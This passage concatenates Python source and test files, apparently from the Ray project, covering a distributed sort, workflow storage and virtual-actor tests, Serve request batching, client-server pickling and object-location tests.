np.frombuffer(np.random.bytes(block_size), dtype=np.uint8))
for _ in range(args.num_reducers)
]
part = _load_partition(path)
sort_fn = _dummy_sort_and_partition \
if args.skip_sorting else sortlib.sort_and_partition
blocks = sort_fn(part, boundaries)
logging.info(f"{task_id} saving to object store")
return [ray.put(part[offset:offset + size]) for offset, size in blocks]
def _dummy_merge(blocks: List[np.ndarray], _n: int) -> Iterable[memoryview]:
for block in blocks:
yield block
@ray.remote
def reducer(reducer_id: PartId, *blocks: List[ray.ObjectRef]) -> PartitionInfo:
logging_utils.init()
task_id = f"R-{reducer_id} Reducer"
logging.info(f"{task_id} starting")
blocks = [np.copy(ray.get(block)) for block in blocks]
merge_fn = _dummy_merge if args.skip_sorting else sortlib.merge_partitions
merger = merge_fn(blocks, args.reducer_batch_num_records)
if args.skip_output:
for datachunk in merger:
del datachunk
logging.info(f"{task_id} done")
return None
else:
pinfo = _make_partition_info(reducer_id, "output")
with open(pinfo.path, "wb") as fout:
for datachunk in merger:
fout.write(datachunk)
logging.info(f"{task_id} done")
return pinfo
@tracing_utils.timeit("sorting")
def sort_main():
partitions = _load_manifest(constants.INPUT_MANIFEST_FILE)
boundaries = sortlib.get_boundaries(args.num_reducers)
mapper_results = np.empty(
(args.num_mappers, args.num_reducers), dtype=object)
for part_id, node, path in partitions:
opt = {} if args.skip_input else {
"resources": {
f"node:{node}": 1 / args.num_mappers
},
"memory": args.input_part_size * 1.2,
}
opt.update(num_returns=args.num_reducers)
mapper_results[part_id, :] = mapper.options(**opt).remote(
boundaries, part_id, path)
reducer_results = []
for r in range(args.num_reducers):
opt = {
"memory": args.output_part_size * 1.0,
}
blocks = mapper_results[:, r].tolist()
ret = reducer.options(**opt).remote(r, *blocks)
reducer_results.append(ret)
reducer_results = ray.get(reducer_results)
if not args.skip_output:
with open(constants.OUTPUT_MANIFEST_FILE, "w") as fout:
writer = csv.writer(fout)
writer.writerows(reducer_results)
# ------------------------------------------------------------
# Validate Output
# ------------------------------------------------------------
@ray.remote
def validate_part(path: Path):
logging_utils.init()
proc = subprocess.run([constants.VALSORT_PATH, path], capture_output=True)
if proc.returncode != 0:
logging.critical("\n" + proc.stderr.decode("ascii"))
raise RuntimeError(f"Validation failed: {path}")
logging.info(f"Validated output {path}")
def validate_output():
if args.skip_output:
return
partitions = _load_manifest(constants.OUTPUT_MANIFEST_FILE)
tasks = []
for _, node, path in partitions:
tasks.append(
validate_part.options(resources={
f"node:{node}": 1 / args.num_reducers
}).remote(path))
logging.info(f"Validating {len(tasks)} partitions")
ray.get(tasks)
logging.info("All done!")
# ------------------------------------------------------------
# Main
# ------------------------------------------------------------
def init():
if args.ray_address is None:
ray.init()
else:
ray.init(address=args.ray_address)
logging_utils.init()
logging.info(args)
logging.info(ray.available_resources())
os.makedirs(constants.WORK_DIR, exist_ok=True)
def main():
init()
if args.generate_input:
generate_input()
if args.sort:
sort_main()
if args.validate_output:
validate_output()
if __name__ == "__main__":
args = get_args()
main()
```
#### File: workflow/tests/test_storage_failure.py
```python
import asyncio
import os
from hashlib import sha1
import tempfile
import pytest
import ray
from ray.experimental import workflow
from ray.experimental.workflow.storage import (get_global_storage,
set_global_storage)
from ray.experimental.workflow.storage.debug import DebugStorage
from ray.experimental.workflow.workflow_storage import STEP_OUTPUTS_METADATA
from ray.experimental.workflow.workflow_storage import asyncio_run
from ray.experimental.workflow.storage.filesystem import FilesystemStorageImpl
@workflow.step
def pass_1(x: str, y: str):
return sha1((x + y + "1").encode()).hexdigest()
@workflow.step
def pass_2(x: str, y: str):
if sha1((x + y + "_2").encode()).hexdigest() > x:
return sha1((x + y + "2").encode()).hexdigest()
return pass_1.step(x, y)
@workflow.step
def pass_3(x: str, y: str):
if sha1((x + y + "_3").encode()).hexdigest() > x:
return sha1((x + y + "3").encode()).hexdigest()
return pass_2.step(x, y)
@workflow.step
def merge(x0: str, x1: str, x2: str) -> str:
return sha1((x0 + x1 + x2).encode()).hexdigest()
@workflow.step
def scan(x0: str, x1: str, x2: str):
x0 = sha1((x0 + x2).encode()).hexdigest()
x1 = sha1((x1 + x2).encode()).hexdigest()
x2 = sha1((x0 + x1 + x2).encode()).hexdigest()
y0, y1, y2 = pass_1.step(x0, x1), pass_2.step(x1, x2), pass_3.step(x2, x0)
return merge.step(y0, y1, y2)
def construct_workflow(length: int):
results = ["a", "b"]
for i in range(length):
x0, x1, x2 = results[-2], results[-1], str(i)
results.append(scan.step(x0, x1, x2))
return results[-1]
def _alter_storage(new_storage):
set_global_storage(new_storage)
# alter the storage
ray.shutdown()
os.system("ray stop --force")
workflow.init(new_storage)
def _locate_initial_commit(debug_store: DebugStorage) -> int:
for i in range(len(debug_store)):
log = debug_store.get_log(i)
if log["key"].endswith(STEP_OUTPUTS_METADATA):
return i
return -1
@pytest.mark.parametrize(
"workflow_start_regular",
[{
"num_cpus": 4, # increase CPUs to add pressure
}],
indirect=True)
def test_failure_with_storage(workflow_start_regular):
with tempfile.TemporaryDirectory() as temp_dir:
debug_store = DebugStorage(get_global_storage(), temp_dir)
_alter_storage(debug_store)
wf = construct_workflow(length=3)
result = wf.run(workflow_id="complex_workflow")
index = _locate_initial_commit(debug_store) + 1
def resume(num_records_replayed):
key = debug_store.wrapped_storage.make_key("complex_workflow")
asyncio_run(debug_store.wrapped_storage.delete_prefix(key))
replays = [
debug_store.replay(i) for i in range(num_records_replayed)
]
asyncio_run(asyncio.gather(*replays))
return ray.get(workflow.resume(workflow_id="complex_workflow"))
with pytest.raises(ValueError):
            # In this case, the replayed records are too few to resume
            # the workflow.
resume(index - 1)
if isinstance(debug_store.wrapped_storage, FilesystemStorageImpl):
# filesystem is faster, so we can cover all cases
step_len = 1
else:
step_len = max((len(debug_store) - index) // 5, 1)
for j in range(index, len(debug_store), step_len):
assert resume(j) == result
if __name__ == "__main__":
import sys
sys.exit(pytest.main(["-v", __file__]))
```
#### File: workflow/tests/test_virtual_actor_2.py
```python
import time
import ray
import pytest
from ray.tests.conftest import * # noqa
from ray.experimental import workflow
@workflow.virtual_actor
class Counter:
def __init__(self, x: int):
self.x = x
@workflow.virtual_actor.readonly
def readonly_get(self):
return self.x
@workflow.virtual_actor.readonly
def readonly_incr(self):
self.x += 1
return self.x
def add(self, y):
self.x += y
return self.x
def __getstate__(self):
return self.x
def __setstate__(self, state):
self.x = state
@workflow.virtual_actor
class IndirectCounter:
def __init__(self, x):
actor = Counter.get_or_create("counter", x)
ray.get(actor.ready())
@workflow.virtual_actor.readonly
def readonly_get(self):
actor = workflow.get_actor("counter")
return actor.readonly_get.run()
@workflow.virtual_actor.readonly
def readonly_incr(self):
actor = workflow.get_actor("counter")
return actor.readonly_incr.run()
def add(self, y):
actor = workflow.get_actor("counter")
return actor.add.run(y)
@workflow.virtual_actor.readonly
def readonly_workload(self):
# simulate a workload
time.sleep(1)
def __getstate__(self):
return
def __setstate__(self, state):
pass
@pytest.mark.parametrize(
"workflow_start_regular",
[{
"num_cpus": 4
# We need more CPUs, otherwise 'create()' blocks 'get()'
}],
indirect=True)
def test_indirect_actor_writer(workflow_start_regular):
actor = IndirectCounter.get_or_create("indirect_counter", 0)
ray.get(actor.ready())
assert actor.readonly_get.run() == 0
array = []
s = 0
for i in range(1, 10):
s += i
array.append(s)
assert [actor.add.run(i) for i in range(1, 10)] == array
assert actor.readonly_get.run() == 45
array = []
for i in range(10, 20):
s += i
array.append(s)
assert ray.get([actor.add.run_async(i) for i in range(10, 20)]) == array
if __name__ == "__main__":
import sys
sys.exit(pytest.main(["-v", __file__]))
```
#### File: ray/serve/batching.py
```python
import asyncio
from functools import wraps
from inspect import iscoroutinefunction
import time
from typing import Any, Callable, List, Optional, overload, Tuple, TypeVar
from ray.serve.exceptions import RayServeException
class _BatchQueue:
def __init__(self,
max_batch_size: int,
timeout_s: float,
handle_batch_func: Optional[Callable] = None) -> None:
"""Async queue that accepts individual items and returns batches.
Respects max_batch_size and timeout_s; a batch will be returned when
max_batch_size elements are available or the timeout has passed since
the previous get.
        If handle_batch_func is passed in, a background coroutine will run to
        poll from the queue and call handle_batch_func on each batch.
Arguments:
max_batch_size (int): max number of elements to return in a batch.
timeout_s (float): time to wait before returning an incomplete
batch.
            handle_batch_func (Optional[Callable]): callback to run in the
background to handle batches if provided.
"""
self.queue = asyncio.Queue()
self.full_batch_event = asyncio.Event()
self.max_batch_size = max_batch_size
self.timeout_s = timeout_s
self._handle_batch_task = None
if handle_batch_func is not None:
self._handle_batch_task = asyncio.get_event_loop().create_task(
self._handle_batches(handle_batch_func))
def put(self, request: Tuple[Any, asyncio.Future]) -> None:
self.queue.put_nowait(request)
# Signal when the full batch is ready. The event will be reset
# in wait_for_batch.
if self.queue.qsize() == self.max_batch_size:
self.full_batch_event.set()
async def wait_for_batch(self) -> List[Any]:
"""Wait for batch respecting self.max_batch_size and self.timeout_s.
Returns a batch of up to self.max_batch_size items, waiting for up
to self.timeout_s for a full batch. After the timeout, returns as many
items as are ready.
Always returns a batch with at least one item - will block
indefinitely until an item comes in.
"""
curr_timeout = self.timeout_s
batch = []
while len(batch) == 0:
loop_start = time.time()
# If the timeout is 0, wait for any item to be available on the
# queue.
if curr_timeout == 0:
batch.append(await self.queue.get())
# If the timeout is nonzero, wait for either the timeout to occur
# or the max batch size to be ready.
else:
try:
await asyncio.wait_for(self.full_batch_event.wait(),
curr_timeout)
except asyncio.TimeoutError:
pass
# Pull up to the max_batch_size requests off the queue.
while len(batch) < self.max_batch_size and not self.queue.empty():
batch.append(self.queue.get_nowait())
# Reset the event if there are fewer than max_batch_size requests
# in the queue.
if (self.queue.qsize() < self.max_batch_size
and self.full_batch_event.is_set()):
self.full_batch_event.clear()
# Adjust the timeout based on the time spent in this iteration.
curr_timeout = max(0, curr_timeout - (time.time() - loop_start))
return batch
async def _handle_batches(self, func):
while True:
batch = await self.wait_for_batch()
assert len(batch) > 0
self_arg = batch[0][0]
args = [item[1] for item in batch]
futures = [item[2] for item in batch]
try:
# Method call.
if self_arg is not None:
results = await func(self_arg, args)
# Normal function call.
else:
results = await func(args)
if len(results) != len(batch):
raise RayServeException(
"Batched function doesn't preserve batch size. "
f"The input list has length {len(batch)} but the "
f"returned list has length {len(results)}.")
for i, result in enumerate(results):
futures[i].set_result(result)
except Exception as e:
for future in futures:
future.set_exception(e)
def __del__(self):
if (self._handle_batch_task is None
or not asyncio.get_event_loop().is_running()):
return
# TODO(edoakes): although we try to gracefully shutdown here, it still
# causes some errors when the process exits due to the asyncio loop
# already being destroyed.
self._handle_batch_task.cancel()
def extract_self_if_method_call(args: List[Any],
func: Callable) -> Optional[object]:
"""Check if this is a method rather than a function.
Does this by checking to see if `func` is the attribute of the first
    (`self`) argument under `func.__name__`. Unfortunately, this is the most
    robust solution available. It would also be preferable to do this check
    when the decorator runs rather than on every method call.
Returns the `self` object if it's a method call, else None.
Arguments:
args (List[Any]): arguments to the function/method call.
func (Callable): the unbound function that was called.
"""
if len(args) > 0:
method = getattr(args[0], func.__name__, False)
if method:
wrapped = getattr(method, "__wrapped__", False)
if wrapped and wrapped == func:
return args.pop(0)
return None
T = TypeVar("T")
R = TypeVar("R")
F = TypeVar("F", bound=Callable[[List[T]], List[R]])
G = TypeVar("G", bound=Callable[[T], R])
# Normal decorator use case (called with no arguments).
@overload
def batch(func: F) -> G:
pass
# "Decorator factory" use case (called with arguments).
@overload
def batch(max_batch_size: Optional[int] = 10,
batch_wait_timeout_s: Optional[float] = 0.0) -> Callable[[F], G]:
pass
def batch(_func=None, max_batch_size=10, batch_wait_timeout_s=0.0):
"""Converts a function to asynchronously handle batches.
The function can be a standalone function or a class method. In both
cases, the function must be `async def` and take a list of objects as
its sole argument and return a list of the same length as a result.
    When invoked, the caller passes a single object. Calls are batched and
    executed asynchronously once `max_batch_size` objects have accumulated
    or `batch_wait_timeout_s` has elapsed, whichever occurs first.
Example:
>>> @serve.batch(max_batch_size=50, batch_wait_timeout_s=0.5)
async def handle_batch(batch: List[str]):
return [s.lower() for s in batch]
>>> async def handle_single(s: str):
return await handle_batch(s) # Returns s.lower().
Arguments:
max_batch_size (int): the maximum batch size that will be executed in
one call to the underlying function.
batch_wait_timeout_s (float): the maximum duration to wait for
`max_batch_size` elements before running the underlying function.
"""
# `_func` will be None in the case when the decorator is parametrized.
# See the comment at the end of this function for a detailed explanation.
if _func is not None:
if not callable(_func):
raise TypeError("@serve.batch can only be used to "
"decorate functions or methods.")
if not iscoroutinefunction(_func):
raise TypeError(
"Functions decorated with @serve.batch must be 'async def'")
if not isinstance(max_batch_size, int):
if isinstance(max_batch_size, float) and max_batch_size.is_integer():
max_batch_size = int(max_batch_size)
else:
            raise TypeError("max_batch_size must be an integer >= 1")
if max_batch_size < 1:
raise ValueError("max_batch_size must be an integer >= 1")
if not isinstance(batch_wait_timeout_s, (float, int)):
raise TypeError("batch_wait_timeout_s must be a float >= 0")
if batch_wait_timeout_s < 0:
raise ValueError("batch_wait_timeout_s must be a float >= 0")
def _batch_decorator(_func):
@wraps(_func)
async def batch_wrapper(*args, **kwargs):
args = list(args)
self = extract_self_if_method_call(args, _func)
if len(args) != 1:
raise ValueError("@serve.batch functions can only take a "
"single argument as input")
if len(kwargs) != 0:
raise ValueError(
"@serve.batch functions do not support kwargs")
if self is None:
# For functions, inject the batch queue as an
# attribute of the function.
batch_queue_object = _func
else:
# For methods, inject the batch queue as an
# attribute of the object.
batch_queue_object = self
# The first time the function runs, we lazily construct the batch
# queue and inject it under a custom attribute name. On subsequent
# runs, we just get a reference to the attribute.
batch_queue_attr = f"__serve_batch_queue_{_func.__name__}"
if not hasattr(batch_queue_object, batch_queue_attr):
batch_queue = _BatchQueue(max_batch_size, batch_wait_timeout_s,
_func)
setattr(batch_queue_object, batch_queue_attr, batch_queue)
else:
batch_queue = getattr(batch_queue_object, batch_queue_attr)
future = asyncio.get_event_loop().create_future()
batch_queue.put((self, args[0], future))
# This will raise if the underlying call raised an exception.
return await future
return batch_wrapper
# Unfortunately, this is required to handle both non-parametrized
# (@serve.batch) and parametrized (@serve.batch(**kwargs)) usage.
# In the former case, `serve.batch` will be called with the underlying
# function as the sole argument. In the latter case, it will first be
# called with **kwargs, then the result of that call will be called
# with the underlying function as the sole argument (i.e., it must be a
# "decorator factory.").
return _batch_decorator(_func) if callable(_func) else _batch_decorator
```
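A minimal usage sketch based on the docstring above, assuming this decorator is exposed as `serve.batch` (as the docstring suggests); callers pass single items and the wrapper batches them transparently.
```python
import asyncio

from ray import serve

@serve.batch(max_batch_size=4, batch_wait_timeout_s=0.1)
async def to_lower(batch):
    # Receives a list of strings and must return a list of equal length.
    return [s.lower() for s in batch]

async def main():
    # Each caller passes a single item; calls are batched behind the scenes.
    results = await asyncio.gather(*[to_lower(s) for s in ["A", "B", "C"]])
    print(results)  # ['a', 'b', 'c']

asyncio.run(main())
```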
#### File: doc/fastapi/fastapi_simple.py
```python
from fastapi import FastAPI
from transformers import pipeline # A simple API for NLP tasks.
app = FastAPI()
nlp_model = pipeline("text-generation", model="gpt2") # Load the model.
# The function below handles GET requests to the URL `/generate`.
@app.get("/generate")
def generate(query: str):
return nlp_model(query, max_length=50) # Output 50 words based on query.
```
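A minimal client sketch, assuming the app above is served locally (for example with `uvicorn fastapi_simple:app --port 8000`); the port and query text are illustrative.
```python
import requests

resp = requests.get(
    "http://localhost:8000/generate", params={"query": "Ray is"})
print(resp.json())  # JSON-serialized output of the GPT-2 pipeline
```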
#### File: serve/tests/test_async_goal_manager.py
```python
import asyncio
import pytest
from ray.serve.async_goal_manager import AsyncGoalManager
@pytest.mark.asyncio
async def test_wait_for_goals():
manager = AsyncGoalManager()
# Check empty goal
await manager.wait_for_goal(None)
goal_id = manager.create_goal()
loop = asyncio.get_event_loop()
waiting = loop.create_task(manager.wait_for_goal(goal_id))
assert not waiting.done(), "Unfinished task should not be done"
manager.complete_goal(goal_id)
await waiting
# Test double waiting is okay
await manager.wait_for_goal(goal_id)
if __name__ == "__main__":
import sys
sys.exit(pytest.main(["-v", "-s", __file__]))
```
#### File: serve/tests/test_controller.py
```python
import pytest
import ray
from ray import serve
def test_controller_inflight_requests_clear(serve_instance):
controller = serve.api._global_client._controller
initial_number_reqs = ray.get(controller._num_pending_goals.remote())
@serve.deployment
def test(_):
return "hello"
test.deploy()
assert ray.get(
controller._num_pending_goals.remote()) - initial_number_reqs == 0
if __name__ == "__main__":
import sys
sys.exit(pytest.main(["-v", "-s", __file__]))
```
#### File: serve/tests/test_util.py
```python
import json
import numpy as np
import pytest
import ray
from ray.serve.utils import ServeEncoder
from ray._private.utils import import_attr
def test_bytes_encoder():
data_before = {"inp": {"nest": b"bytes"}}
data_after = {"inp": {"nest": "bytes"}}
assert json.loads(json.dumps(data_before, cls=ServeEncoder)) == data_after
def test_numpy_encoding():
data = [1, 2]
floats = np.array(data).astype(np.float32)
ints = floats.astype(np.int32)
uints = floats.astype(np.uint32)
assert json.loads(json.dumps(floats, cls=ServeEncoder)) == data
assert json.loads(json.dumps(ints, cls=ServeEncoder)) == data
assert json.loads(json.dumps(uints, cls=ServeEncoder)) == data
def test_import_attr():
assert (import_attr("ray.serve.BackendConfig") ==
ray.serve.config.BackendConfig)
assert (import_attr("ray.serve.config.BackendConfig") ==
ray.serve.config.BackendConfig)
policy_cls = import_attr("ray.serve.controller.TrafficPolicy")
assert policy_cls == ray.serve.controller.TrafficPolicy
policy = policy_cls({"endpoint1": 0.5, "endpoint2": 0.5})
with pytest.raises(ValueError):
policy.set_traffic_dict({"endpoint1": 0.5, "endpoint2": 0.6})
policy.set_traffic_dict({"endpoint1": 0.4, "endpoint2": 0.6})
print(repr(policy))
# Very meta...
import_attr_2 = import_attr("ray._private.utils.import_attr")
assert import_attr_2 == import_attr
if __name__ == "__main__":
import sys
sys.exit(pytest.main(["-v", "-s", __file__]))
```
#### File: ray/tests/client_test_utils.py
```python
import asyncio
def create_remote_signal_actor(ray):
# TODO(barakmich): num_cpus=0
@ray.remote
class SignalActor:
def __init__(self):
self.ready_event = asyncio.Event()
def send(self, clear=False):
self.ready_event.set()
if clear:
self.ready_event.clear()
async def wait(self, should_wait=True):
if should_wait:
await self.ready_event.wait()
return SignalActor
```
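A minimal usage sketch of the helper above, assuming it is importable as `ray.tests.client_test_utils.create_remote_signal_actor` (path taken from the file header) and that a local Ray instance is available:
```python
import ray

from ray.tests.client_test_utils import create_remote_signal_actor

ray.init()
SignalActor = create_remote_signal_actor(ray)
signal = SignalActor.remote()

@ray.remote
def blocked_task():
    ray.get(signal.wait.remote())  # parks until send() is called
    return "released"

ref = blocked_task.remote()
signal.send.remote()
print(ray.get(ref))  # "released"
ray.shutdown()
```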
#### File: ray/tests/test_client_server.py
```python
import pytest
from unittest.mock import patch, Mock
from ray.ray_constants import REDIS_DEFAULT_PASSWORD
import ray.util.client.server.server as client_server
@pytest.mark.parametrize("redis_password", [None, "random_password"])
def test_try_create_redis_client(redis_password):
create_mock = Mock(side_effect=lambda x, y: x)
with patch(
"ray._private.services", create_redis_client=create_mock), patch(
"ray._private.services.find_redis_address",
side_effect=[["address0", "address1"], [], ["address0"]]):
# Two redis addresses found
assert client_server.try_create_redis_client(None,
redis_password) is None
create_mock.assert_not_called()
# No redis addresses found
assert client_server.try_create_redis_client(None,
redis_password) is None
create_mock.assert_not_called()
# Exactly one redis address found
assert client_server.try_create_redis_client(
None, redis_password) == "address0"
create_mock.assert_called_once_with(
"address0", redis_password or REDIS_DEFAULT_PASSWORD)
create_mock.reset_mock()
# Manually specify redis
client_server.try_create_redis_client("address100", redis_password)
create_mock.assert_called_once_with(
"address100", redis_password or REDIS_DEFAULT_PASSWORD)
if __name__ == "__main__":
import sys
sys.exit(pytest.main(["-v", __file__]))
```
#### File: ray/tests/test_distributed_sort.py
```python
import pytest
import sys
from ray.experimental.raysort import main
def test_distributed_sort():
main.args = main.get_args()
main.args.ray_address = None
main.args.total_data_size = 1_000_000_000
main.args.skip_input = True
main.args.skip_output = True
main.main()
if __name__ == "__main__":
sys.exit(pytest.main(["-v", __file__]))
```
#### File: ray/tests/test_get_locations.py
```python
import numpy as np
import pytest
import platform
import time
import ray
def test_uninitialized():
with pytest.raises(RuntimeError):
ray.experimental.get_object_locations([])
def test_get_locations_empty_list(ray_start_regular):
locations = ray.experimental.get_object_locations([])
assert len(locations) == 0
def test_get_locations_timeout(ray_start_regular):
sizes = [100, 1000]
obj_refs = [ray.put(np.zeros(s, dtype=np.uint8)) for s in sizes]
ray.wait(obj_refs)
timeout_ms = 0
with pytest.raises(ray.exceptions.GetTimeoutError):
ray.experimental.get_object_locations(obj_refs, timeout_ms)
def test_get_locations(ray_start_regular):
node_id = ray.runtime_context.get_runtime_context().get()["node_id"]
sizes = [100, 1000]
obj_refs = [ray.put(np.zeros(s, dtype=np.uint8)) for s in sizes]
ray.wait(obj_refs)
locations = ray.experimental.get_object_locations(obj_refs)
assert len(locations) == 2
for idx, obj_ref in enumerate(obj_refs):
location = locations[obj_ref]
assert location["object_size"] > sizes[idx]
assert location["node_ids"] == [node_id.hex()]
def test_get_locations_inlined(ray_start_regular):
node_id = ray.runtime_context.get_runtime_context().get()["node_id"]
obj_refs = [ray.put("123")]
ray.wait(obj_refs)
locations = ray.experimental.get_object_locations(obj_refs)
for idx, obj_ref in enumerate(obj_refs):
location = locations[obj_ref]
assert location["node_ids"] == [node_id.hex()]
assert location["object_size"] > 0
@pytest.mark.skipif(
platform.system() == "Windows", reason="Failing on Windows.")
def test_spilled_locations(ray_start_cluster):
cluster = ray_start_cluster
cluster.add_node(num_cpus=1, object_store_memory=75 * 1024 * 1024)
ray.init(cluster.address)
cluster.wait_for_nodes()
node_id = ray.runtime_context.get_runtime_context().get()["node_id"]
@ray.remote
def task():
arr = np.random.rand(5 * 1024 * 1024) # 40 MB
refs = []
refs.extend([ray.put(arr) for _ in range(2)])
ray.get(ray.put(arr))
ray.get(ray.put(arr))
return refs
object_refs = ray.get(task.remote())
ray.wait(object_refs)
locations = ray.experimental.get_object_locations(object_refs)
for obj_ref in object_refs:
location = locations[obj_ref]
assert location["node_ids"] == [node_id.hex()]
assert location["object_size"] > 0
@pytest.mark.skipif(
platform.system() == "Windows", reason="Failing on Windows.")
def test_get_locations_multi_nodes(ray_start_cluster):
cluster = ray_start_cluster
# head node
cluster.add_node(num_cpus=1, object_store_memory=75 * 1024 * 1024)
ray.init(cluster.address)
# add 1 worker node
cluster.add_node(
num_cpus=0,
resources={"custom": 1},
object_store_memory=75 * 1024 * 1024)
cluster.wait_for_nodes()
all_node_ids = list(map(lambda node: node["NodeID"], ray.nodes()))
driver_node_id = ray.runtime_context.get_runtime_context().get()[
"node_id"].hex()
all_node_ids.remove(driver_node_id)
worker_node_id = all_node_ids[0]
@ray.remote(num_cpus=0, resources={"custom": 1})
def create_object():
return np.random.rand(1 * 1024 * 1024)
@ray.remote
def task():
return [create_object.remote()]
object_refs = ray.get(task.remote())
ray.wait(object_refs)
locations = ray.experimental.get_object_locations(object_refs)
for obj_ref in object_refs:
location = locations[obj_ref]
assert set(location["node_ids"]) == {driver_node_id, worker_node_id}
assert location["object_size"] > 0
def test_location_pending(ray_start_cluster):
cluster = ray_start_cluster
cluster.add_node(num_cpus=1, object_store_memory=75 * 1024 * 1024)
ray.init(cluster.address)
cluster.wait_for_nodes()
@ray.remote
def task():
# sleep for 1 hour so the object will be pending
time.sleep(3600)
return 1
object_ref = task.remote()
locations = ray.experimental.get_object_locations([object_ref])
location = locations[object_ref]
assert location["node_ids"] == []
    # TODO(chenshen): this is a result of converting int -1 to unsigned int;
    # should be fixed by https://github.com/ray-project/ray/issues/16321
assert location["object_size"] == 2**64 - 1
```
#### File: ray/tests/test_kv.py
```python
import ray
from ray import ray_constants
from ray._raylet import connect_to_gcs
def run_kv_test(gcs_client):
assert gcs_client.kv_put(b"TEST_KEY", b"TEST_VAL", True)
assert b"TEST_VAL" == gcs_client.kv_get(b"TEST_KEY")
assert not gcs_client.kv_exists(b"TEST_KEY2")
gcs_client.kv_del(b"TEST_KEY")
assert not gcs_client.kv_exists(b"TEST_KEY")
assert gcs_client.kv_put(b"TEST_KEY", b"TEST_VAL", False)
assert not gcs_client.kv_put(b"TEST_KEY", b"TEST_VAL2", False)
assert gcs_client.kv_get(b"TEST_KEY") == b"TEST_VAL"
assert not gcs_client.kv_put(b"TEST_KEY", b"TEST_VAL2", True)
assert gcs_client.kv_get(b"TEST_KEY") == b"TEST_VAL2"
gcs_client.kv_del(b"TEST_KEY")
assert gcs_client.kv_get(b"TEST_KEY") is None
assert gcs_client.kv_put(b"TEST_KEY_1", b"TEST_VAL_1", True)
assert gcs_client.kv_put(b"TEST_KEY_2", b"TEST_VAL_2", True)
assert gcs_client.kv_put(b"TEST_KEY_3", b"TEST_VAL_3", True)
assert gcs_client.kv_put(b"TEST_KEY_4", b"TEST_VAL_4", True)
keys = set(gcs_client.kv_keys(b"TEST_KEY_"))
assert keys == {b"TEST_KEY_1", b"TEST_KEY_2", b"TEST_KEY_3", b"TEST_KEY_4"}
def test_gcs_client_core_worker(shutdown_only):
ray.init()
gcs_client = ray.worker.global_worker.core_worker.get_gcs_client()
run_kv_test(gcs_client)
def test_gcs_client_address(ray_start_cluster_head):
cluster = ray_start_cluster_head
ip, port = cluster.address.split(":")
password = ray_constants.REDIS_DEFAULT_PASSWORD
gcs_client = connect_to_gcs(ip, int(port), password)
run_kv_test(gcs_client)
```
#### File: client/server/server_pickler.py
```python
import io
import sys
import ray
from typing import Any
from typing import TYPE_CHECKING
from ray._private.client_mode_hook import disable_client_hook
import ray.cloudpickle as cloudpickle
from ray.util.client.client_pickler import PickleStub
from ray.util.client.server.server_stubs import ClientReferenceActor
from ray.util.client.server.server_stubs import ClientReferenceFunction
if TYPE_CHECKING:
from ray.util.client.server.server import RayletServicer
import ray.core.generated.ray_client_pb2 as ray_client_pb2
if sys.version_info < (3, 8):
try:
import pickle5 as pickle # noqa: F401
except ImportError:
import pickle # noqa: F401
else:
import pickle # noqa: F401
class ServerPickler(cloudpickle.CloudPickler):
def __init__(self, client_id: str, server: "RayletServicer", *args,
**kwargs):
super().__init__(*args, **kwargs)
self.client_id = client_id
self.server = server
def persistent_id(self, obj):
if isinstance(obj, ray.ObjectRef):
obj_id = obj.binary()
if obj_id not in self.server.object_refs[self.client_id]:
# We're passing back a reference, probably inside a reference.
# Let's hold onto it.
self.server.object_refs[self.client_id][obj_id] = obj
return PickleStub(
type="Object",
client_id=self.client_id,
ref_id=obj_id,
name=None,
baseline_options=None,
)
elif isinstance(obj, ray.actor.ActorHandle):
actor_id = obj._actor_id.binary()
if actor_id not in self.server.actor_refs:
# We're passing back a handle, probably inside a reference.
self.server.actor_refs[actor_id] = obj
if actor_id not in self.server.actor_owners[self.client_id]:
self.server.actor_owners[self.client_id].add(actor_id)
return PickleStub(
type="Actor",
client_id=self.client_id,
ref_id=obj._actor_id.binary(),
name=None,
baseline_options=None,
)
return None
class ClientUnpickler(pickle.Unpickler):
def __init__(self, server, *args, **kwargs):
super().__init__(*args, **kwargs)
self.server = server
def persistent_load(self, pid):
assert isinstance(pid, PickleStub)
if pid.type == "Ray":
return ray
elif pid.type == "Object":
return self.server.object_refs[pid.client_id][pid.ref_id]
elif pid.type == "Actor":
return self.server.actor_refs[pid.ref_id]
elif pid.type == "RemoteFuncSelfReference":
return ClientReferenceFunction(pid.client_id, pid.ref_id)
elif pid.type == "RemoteFunc":
return self.server.lookup_or_register_func(
pid.ref_id, pid.client_id, pid.baseline_options)
elif pid.type == "RemoteActorSelfReference":
return ClientReferenceActor(pid.client_id, pid.ref_id)
elif pid.type == "RemoteActor":
return self.server.lookup_or_register_actor(
pid.ref_id, pid.client_id, pid.baseline_options)
elif pid.type == "RemoteMethod":
actor = self.server.actor_refs[pid.ref_id]
return getattr(actor, pid.name)
else:
raise NotImplementedError("Uncovered client data type")
def dumps_from_server(obj: Any,
client_id: str,
server_instance: "RayletServicer",
protocol=None) -> bytes:
with io.BytesIO() as file:
sp = ServerPickler(client_id, server_instance, file, protocol=protocol)
sp.dump(obj)
return file.getvalue()
def loads_from_client(data: bytes,
server_instance: "RayletServicer",
*,
fix_imports=True,
encoding="ASCII",
errors="strict") -> Any:
with disable_client_hook():
if isinstance(data, str):
raise TypeError("Can't load pickle from unicode string")
file = io.BytesIO(data)
return ClientUnpickler(
server_instance, file, fix_imports=fix_imports,
encoding=encoding).load()
def convert_from_arg(pb: "ray_client_pb2.Arg",
server: "RayletServicer") -> Any:
return loads_from_client(pb.data, server)
```
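The pickler/unpickler pair above relies on pickle's persistent-ID hook: object refs and actor handles are swapped for `PickleStub`s on the way out and resolved back to live objects on the way in. A self-contained sketch of that standard-library mechanism (the `Handle` class and registry here are illustrative, not part of the Ray code):
```python
import io
import pickle

class Handle:
    """Stand-in for an object that should not be serialized inline."""

    def __init__(self, name):
        self.name = name

registry = {"conn-1": Handle("conn-1")}

class StubPickler(pickle.Pickler):
    def persistent_id(self, obj):
        if isinstance(obj, Handle):
            return ("Handle", obj.name)  # store a small stub instead
        return None  # everything else is pickled normally

class StubUnpickler(pickle.Unpickler):
    def persistent_load(self, pid):
        kind, key = pid
        if kind == "Handle":
            return registry[key]  # resolve the stub to the live object
        raise pickle.UnpicklingError(f"unknown stub {pid!r}")

buf = io.BytesIO()
StubPickler(buf).dump({"payload": 42, "handle": registry["conn-1"]})
buf.seek(0)
restored = StubUnpickler(buf).load()
assert restored["handle"] is registry["conn-1"]
```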
#### File: tests/distributed_multigpu_tests/test_distributed_multigpu_broadcast.py
```python
import pytest
import cupy as cp
import ray
from ray.util.collective.tests.util import create_collective_multigpu_workers
@pytest.mark.parametrize("group_name", ["default", "test", "123?34!"])
@pytest.mark.parametrize("src_rank", [0, 1])
